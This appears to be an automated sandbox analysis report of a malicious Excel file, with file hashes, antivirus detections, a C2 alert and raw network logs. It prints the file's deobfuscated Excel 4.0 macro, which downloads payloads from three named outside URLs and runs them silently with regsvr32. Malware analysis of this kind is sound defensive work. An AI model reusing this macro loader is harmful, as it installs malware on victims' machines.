                                                                                                                    File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1251, Author: Dream, Last Saved By: TYHRETH, Name of Creating Application: Microsoft Excel, Create Time/Date: Fri Jun 5 19:19:34 2015, Last Saved Time/Date: Wed Jun 8 07:41:36 2022, Security: 0
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):47616
                                                                                                                    Entropy (8bit):4.438050729410308
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:768:eDMPKpb8rGYrMPe3q7Q0XV5xtezE8vpI8UM+Vyis73q/44fq/uVD:eYKpb8rGYrMPe3q7Q0XV5xtezE8vG8Uz
                                                                                                                    MD5:FC28C99A70312977C4756F10A1FEBD29
                                                                                                                    SHA1:CDB554A798592B4469CBEFB8A93C2BD8DA632F35
                                                                                                                    SHA-256:6774ED57B825C1D8126F27F36323DFFD9CD8AC7CE3B7AED0ABB856587708986A
                                                                                                                    SHA-512:14573525384C24EB35B4A08169A3B49E268230976F4029113E46620B6E806413494E100AD34746BD0595E9362B3036FF593E7DEB5FB1269154FB4569BF513846
                                                                                                                    Malicious:true
                                                                                                                    Yara Hits:
                                                                                                                    • Rule: SUSP_Excel4Macro_AutoOpen, Description: Detects Excel4 macro use with auto open / close, Source: C:\Users\user\Desktop\documentazione 68668.xls, Author: John Lambert @JohnLaTwC
                                                                                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                    File Type:PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):661504
                                                                                                                    Entropy (8bit):4.956080357124322
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:6144:HioEnJyVLryVLryVLryVLryVLryVLryVLGLO8yMZodxz51dPRHh+u392986Ugn:CAYYYYYY6a8S91d5Yu3w+6
                                                                                                                    MD5:3F418FE2743B42214FC4A6D6BDD15A13
                                                                                                                    SHA1:45A780014944CB01407EAB26D0E472C7E37D4963
                                                                                                                    SHA-256:1EC9DC22A44EB1BD30B4C56B12CCAE1CFCB67F9ABA8F3A8E4A3DE562D237371E
                                                                                                                    SHA-512:1CEE67179EBC7E000F1CA8AAF7BC88603A19A9A0352B1CE751DFFC3EE660211236BDF1F6C2E6BEED4503FC960E128D21230032E6EF0776058FCE26C195E1B00F
                                                                                                                    Malicious:true
                                                                                                                    Antivirus:
                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                    • Antivirus: Metadefender, Detection: 40%, Browse
                                                                                                                    • Antivirus: ReversingLabs, Detection: 88%
                                                                                                                    Joe Sandbox View:
                                                                                                                    • Filename: DOC 18860.xls, Detection: malicious, Browse
                                                                                                                    • Filename: 9880-0806.xls, Detection: malicious, Browse
                                                                                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                    File Type:HTML document, ASCII text, with very long lines
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):6424
                                                                                                                    Entropy (8bit):5.110994009346991
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:96:vGzZELraVLYVQyS2qiCquqHlmRxMsVoWQ2z1:KZELraVUVZfqquq0jaIz1
                                                                                                                    MD5:2826B1E7AF14A75FEE51D4E4534EEFF5
                                                                                                                    SHA1:C9EAB9B2B15CFFC0273B3F8D197007B025018838
                                                                                                                    SHA-256:8CC3FE518E10BFEDD841106B51A5B0FBC337161CFC4D7360DB0436EE9D1A68E5
                                                                                                                    SHA-512:1C77D4A9EDE815B53DF07220742E43A180097F066BE9A6C3AC22F573910955DDB0047700F9F277BD6C794D8560865AD28CF58DE40BB1F939EA4C8CF7F28BA39E
                                                                                                                    Malicious:false
                                                                                                                    Preview:<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN". "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">.. <html xmlns="http://www.w3.org/1999/xhtml"><head> <meta http-equiv="Content-Type" content="text/html; charset=us-ascii" /><meta name="robots" content="noindex, nofollow" /> <title>iPage</title> <link rel="stylesheet" type="text/css" href="http://www1.ipage.com/xslt/elements/generic_csscomponent.css" /> <script src="http://www1.ipage.com/generalAppC/scriptcat/87ae207201c55b84c5270851159260e1.1" type="text/javascript"></script></head><body id="stylesheet1"><style>#nav li {display: inline-block;}a.nav-thin-right {padding: 0 30px;}#nav li a.loginkey, #nav li a.loginkey:hover {background-position: -8px -8px;}</style> <div id="doc2" class="yui-t2"> <div id="hd" style="width: 950px;"> <div id="masthead" style="position: relative;"> <h1><a href="http://www.ipage.com/">iPage</a></h1> <h2>Powerful Web Hosting and Domain Names for Home and Business</h2><img src="http:
                                                                                                                    Process:C:\Windows\System32\regsvr32.exe
                                                                                                                    File Type:PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):661504
                                                                                                                    Entropy (8bit):4.956080357124322
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:6144:HioEnJyVLryVLryVLryVLryVLryVLryVLGLO8yMZodxz51dPRHh+u392986Ugn:CAYYYYYY6a8S91d5Yu3w+6
                                                                                                                    MD5:3F418FE2743B42214FC4A6D6BDD15A13
                                                                                                                    SHA1:45A780014944CB01407EAB26D0E472C7E37D4963
                                                                                                                    SHA-256:1EC9DC22A44EB1BD30B4C56B12CCAE1CFCB67F9ABA8F3A8E4A3DE562D237371E
                                                                                                                    SHA-512:1CEE67179EBC7E000F1CA8AAF7BC88603A19A9A0352B1CE751DFFC3EE660211236BDF1F6C2E6BEED4503FC960E128D21230032E6EF0776058FCE26C195E1B00F
                                                                                                                    Malicious:true
                                                                                                                    Antivirus:
                                                                                                                    • Antivirus: Metadefender, Detection: 40%, Browse
                                                                                                                    • Antivirus: ReversingLabs, Detection: 88%
                                                                                                                    Joe Sandbox View:
                                                                                                                    • Filename: DOC 18860.xls, Detection: malicious, Browse
                                                                                                                    • Filename: 9880-0806.xls, Detection: malicious, Browse
                                                                                                                    File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1251, Author: Dream, Last Saved By: TYHRETH, Name of Creating Application: Microsoft Excel, Create Time/Date: Fri Jun 5 19:19:34 2015, Last Saved Time/Date: Wed Jun 8 07:41:36 2022, Security: 0
                                                                                                                    Entropy (8bit):4.4366946198152215
                                                                                                                    TrID:
                                                                                                                    • Microsoft Excel sheet (30009/1) 78.94%
                                                                                                                    • Generic OLE2 / Multistream Compound File (8008/1) 21.06%
                                                                                                                    File name:documentazione 68668.xls
                                                                                                                    File size:47616
                                                                                                                    MD5:a4c856aa217eab1f66dfade13f701013
                                                                                                                    SHA1:c4bd8e7e5cbb3e8038186851e7eb9ee65007c64d
                                                                                                                    SHA256:51737c16eed7b848b37b843555c7bda5ead1f418fbadb8def452d287d0817179
                                                                                                                    SHA512:ea03f122caa5b5d019c122827c895b447f40d796574cd3ae8206e52d412dd9f9cb95d51decf8167de4d42a3a21068b841ab06a9616de22e676271945eb54ae0e
                                                                                                                    SSDEEP:768:hDMPKpb8rGYrMPe3q7Q0XV5xtezE8vpI8UM+Vyis73q/44fq/uVR:hYKpb8rGYrMPe3q7Q0XV5xtezE8vG8Uh
                                                                                                                    TLSH:1423B546BB5AC85DF915873448E747EA7323EC314F6B07833669B3256FF88A05A0325B
                                                                                                                    Icon Hash:e4eea286a4b4bcb4
                                                                                                                    Document Type:OLE
                                                                                                                    Number of OLE Files:1
                                                                                                                    Has Summary Info:
                                                                                                                    Application Name:Microsoft Excel
                                                                                                                    Encrypted Document:False
                                                                                                                    Contains Word Document Stream:False
                                                                                                                    Contains Workbook/Book Stream:True
                                                                                                                    Contains PowerPoint Document Stream:False
                                                                                                                    Contains Visio Document Stream:False
                                                                                                                    Contains ObjectPool Stream:False
                                                                                                                    Flash Objects Count:0
                                                                                                                    Contains VBA Macros:False
                                                                                                                    Code Page:1251
                                                                                                                    Author:Dream
                                                                                                                    Last Saved By:TYHRETH
                                                                                                                    Create Time:2015-06-05 18:19:34
                                                                                                                    Last Saved Time:2022-06-08 06:41:36
                                                                                                                    Creating Application:Microsoft Excel
                                                                                                                    Security:0
                                                                                                                    Document Code Page:1251
                                                                                                                    Thumbnail Scaling Desired:False
                                                                                                                    Company:
                                                                                                                    Contains Dirty Links:False
                                                                                                                    Shared Document:False
                                                                                                                    Changed Hyperlinks:False
                                                                                                                    Application Version:1048576
                                                                                                                    General
                                                                                                                    Stream Path:\x5DocumentSummaryInformation
                                                                                                                    File Type:data
                                                                                                                    Stream Size:4096
                                                                                                                    Entropy:0.5362437358174649
                                                                                                                    Base64 Encoded:False
                                                                                                                    General
                                                                                                                    Stream Path:\x5SummaryInformation
                                                                                                                    File Type:data
                                                                                                                    Stream Size:4096
                                                                                                                    Entropy:0.2811000845961033
                                                                                                                    Base64 Encoded:False
                                                                                                                    General
                                                                                                                    Stream Path:Workbook
                                                                                                                    File Type:Applesoft BASIC program data, first line number 16
                                                                                                                    Stream Size:37656
                                                                                                                    Entropy:5.157896293392311
                                                                                                                    Base64 Encoded:True
                                                                                                                    Name:PKEKPPGEKKPGE
                                                                                                                    Extraction:dynamic
                                                                                                                    Type:4
                                                                                                                    Final:False
                                                                                                                    Visible:False
                                                                                                                    Protected:False
                                                                                                                    2,5,=FORMULA("=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://www.zardamarine.com/images/psQbAjrrEOXWPrS/","..\wdusx1.ocx",0,0)",F13)=FORMULA("=EXEC("C:\Windows\System32\regsvr32.exe /S ..\wdusx1.ocx")",F17)=FORMULA("=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://kronostr.com/tr/68yHRhfuU7Qj/","..\wdusx2.ocx",0,0)",F19)=FORMULA("=EXEC("C:\Windows\System32\regsvr32.exe /S ..\wdusx2.ocx")",F21)=FORMULA("=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://labfitouts.com/cgi-bin/Rea3Iu3wGvgAbTset0/","..\wdusx3.ocx",0,0)",F23)=FORMULA("=EXEC("C:\Windows\System32\regsvr32.exe /S ..\wdusx3.ocx")",F25)=FORMULA("=RETURN()",F35)
                                                                                                                    12,5,=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://www.zardamarine.com/images/psQbAjrrEOXWPrS/","..\wdusx1.ocx",0,0)
                                                                                                                    16,5,=EXEC("C:\Windows\System32\regsvr32.exe /S ..\wdusx1.ocx")
                                                                                                                    18,5,=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://kronostr.com/tr/68yHRhfuU7Qj/","..\wdusx2.ocx",0,0)
                                                                                                                    20,5,=EXEC("C:\Windows\System32\regsvr32.exe /S ..\wdusx2.ocx")
                                                                                                                    22,5,=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://labfitouts.com/cgi-bin/Rea3Iu3wGvgAbTset0/","..\wdusx3.ocx",0,0)
                                                                                                                    24,5,=EXEC("C:\Windows\System32\regsvr32.exe /S ..\wdusx3.ocx")
                                                                                                                    34,5,=RETURN()
                                                                                                                    Name:PKEKPPGEKKPGE, Macrosheet
                                                                                                                    Extraction:static
                                                                                                                    Type:unknown
                                                                                                                    Final:unknown
                                                                                                                    Visible:True
                                                                                                                    Protected:unknown
                                                                                                                    SHEET: PKEKPPGEKKPGE, Macrosheet
                                                                                                                    CELL:F3, =(((((FORMULA(((((((((((((('ESRSGB1'!L24&'ESRSGB1'!L26)&'ESRSGB1'!L27)&'ESRSGB1'!L28)&'ESRSGB1'!L28)&'EGSHRHV2'!B3)&'EGSHRHV2'!E9)&'EGSHRHV2'!G12)&'ESRSGB1'!F10)&'EGSHRHV2'!J6)&'ESHVGRER3'!D4)&'EGSHRHV2'!F16)&'ESHVGRER3'!Q10)&'ESHVGRER3'!C11)&'ESHVGRER3'!O19,F13)=FORMULA((((((((((((((((((('ESRSGB1'!L24&'ESRSGB1'!G8)&'ESRSGB1'!F4)&'ESRSGB1'!G8)&'ESRSGB1'!O3)&'ESRSGB1'!L30)&'ESRSGB1'!F24)&'ESRSGB1'!O3)&'ESHVGRER3'!Q17)&'ESHVGRER3'!R12)&'ESRSGB1'!A4)&'ESHVGRER3'!P23)&'ESRSGB1'!A4)&'ESHVGRER3'!D25)&'ESRSGB1'!F10)&'ESHVGRER3'!E20)&'ESHVGRER3'!M13)&'ESHVGRER3'!C11)&'ESRSGB1'!F24)&'ESRSGB1'!L31,F17))=FORMULA(((((((((((((('ESRSGB1'!L24&'ESRSGB1'!L26)&'ESRSGB1'!L27)&'ESRSGB1'!L28)&'ESRSGB1'!L28)&'EGSHRHV2'!B3)&'EGSHRHV2'!E9)&'EGSHRHV2'!G12)&'ESRSGB1'!F10)&'EGSHRHV2'!J6)&'ESHVGRER3'!D4)&'EGSHRHV2'!G18)&'ESHVGRER3'!Q10)&'ESHVGRER3'!H7)&'ESHVGRER3'!O19,F19))=FORMULA((((((((((((((((((('ESRSGB1'!L24&'ESRSGB1'!G8)&'ESRSGB1'!F4)&'ESRSGB1'!G8)&'ESRSGB1'!O3)&'ESRSGB1'!L30)&'ESRSGB1'!F24)&'ESRSGB1'!O3)&'ESHVGRER3'!Q17)&'ESHVGRER3'!R12)&'ESRSGB1'!A4)&'ESHVGRER3'!P23)&'ESRSGB1'!A4)&'ESHVGRER3'!D25)&'ESRSGB1'!F10)&'ESHVGRER3'!E20)&'ESHVGRER3'!M13)&'ESHVGRER3'!H7)&'ESRSGB1'!F24)&'ESRSGB1'!L31,F21))=FORMULA(((((((((((((('ESRSGB1'!L24&'ESRSGB1'!L26)&'ESRSGB1'!L27)&'ESRSGB1'!L28)&'ESRSGB1'!L28)&'EGSHRHV2'!B3)&'EGSHRHV2'!E9)&'EGSHRHV2'!G12)&'ESRSGB1'!F10)&'EGSHRHV2'!J6)&'ESHVGRER3'!D4)&'EGSHRHV2'!H16)&'ESHVGRER3'!Q10)&'ESHVGRER3'!K15)&'ESHVGRER3'!O19,F23))=FORMULA((((((((((((((((((('ESRSGB1'!L24&'ESRSGB1'!G8)&'ESRSGB1'!F4)&'ESRSGB1'!G8)&'ESRSGB1'!O3)&'ESRSGB1'!L30)&'ESRSGB1'!F24)&'ESRSGB1'!O3)&'ESHVGRER3'!Q17)&'ESHVGRER3'!R12)&'ESRSGB1'!A4)&'ESHVGRER3'!P23)&'ESRSGB1'!A4)&'ESHVGRER3'!D25)&'ESRSGB1'!F10)&'ESHVGRER3'!E20)&'ESHVGRER3'!M13)&'ESHVGRER3'!K15)&'ESRSGB1'!F24)&'ESRSGB1'!L31,F25))=FORMULA((('ESRSGB1'!L24&'ESRSGB1'!G44)&'ESRSGB1'!H46)&'ESRSGB1'!J44,F35), 0
                                                                                                                    Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
                                                                                                                    08/06/22-09:20:53.106547 | TCP | 2404322 | ET CNC Feodo Tracker Reported CnC Server TCP group 12 | 49177 | 8080 | 192.168.2.22 | 198.199.70.22
                                                                                                                    Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                                    Aug 6, 2022 09:20:17.345534086 CEST49171443192.168.2.22208.67.23.91
                                                                                                                    Aug 6, 2022 09:20:17.345561981 CEST44349171208.67.23.91192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:17.345572948 CEST49171443192.168.2.22208.67.23.91
                                                                                                                    Aug 6, 2022 09:20:17.345634937 CEST49171443192.168.2.22208.67.23.91
                                                                                                                    Aug 6, 2022 09:20:17.907493114 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:17.955605030 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:17.955733061 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:17.956005096 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.004107952 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.101455927 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.101490021 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.101511002 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.101535082 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.101555109 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.101566076 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.101586103 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.101591110 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.101597071 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.101619959 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.101619959 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.101646900 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.101658106 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.101670980 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.101676941 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.101699114 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.101706028 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.101717949 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.101758003 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.106215000 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.149869919 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.149924994 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.149971008 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.150001049 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.150046110 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.150094986 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.150105000 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.150132895 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.150139093 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.150156975 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.150177002 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.150208950 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.150228977 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.150259972 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.150270939 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.150310040 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.150330067 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.150361061 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.150369883 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.150412083 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.150420904 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.150460958 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.150475025 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.150523901 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.150902033 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.198625088 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.198654890 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.198673010 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.198709011 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.198725939 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.198744059 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.198761940 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.198779106 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.198796034 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.198812962 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.198833942 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.198857069 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.198869944 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.198877096 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.198896885 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.198911905 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.198915958 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.198935986 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.198936939 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.198956013 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.198976040 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.198976994 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.198999882 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.199006081 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.199023008 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.199035883 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.199045897 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.199065924 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.199069977 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.199090004 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.199100018 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.199110031 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.199140072 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.199177980 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.199963093 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.247195005 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.247243881 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.247284889 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.247324944 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.247400999 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.247459888 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.247468948 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.247493029 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.247495890 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.247519970 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.247528076 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.247570038 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.247598886 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.247626066 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.247629881 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.247679949 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.247690916 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.247730017 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.247740030 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.247782946 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.247817993 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.247829914 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.247840881 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.247883081 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.247895956 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.247935057 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.247948885 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.247981071 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.248003960 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.248033047 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.248039961 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.248084068 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.248100996 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.248136997 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.248146057 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.248188019 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.248198032 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.248239040 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.248255014 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.248289108 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.248308897 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.248341084 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.248352051 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.248389959 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.248405933 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.248428106 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.248450994 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.248451948 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.248501062 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.248512983 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.248553038 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.248560905 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.248608112 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.248613119 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.248658895 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.248666048 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.248719931 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.249072075 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.249278069 CEST4917280192.168.2.22188.132.217.108
                                                                                                                    Aug 6, 2022 09:20:18.296808004 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.296845913 CEST8049172188.132.217.108192.168.2.22
                                                                                                                    Aug 6, 2022 09:20:18.296875000 CEST8049172188.132.217.108192.168.2.22
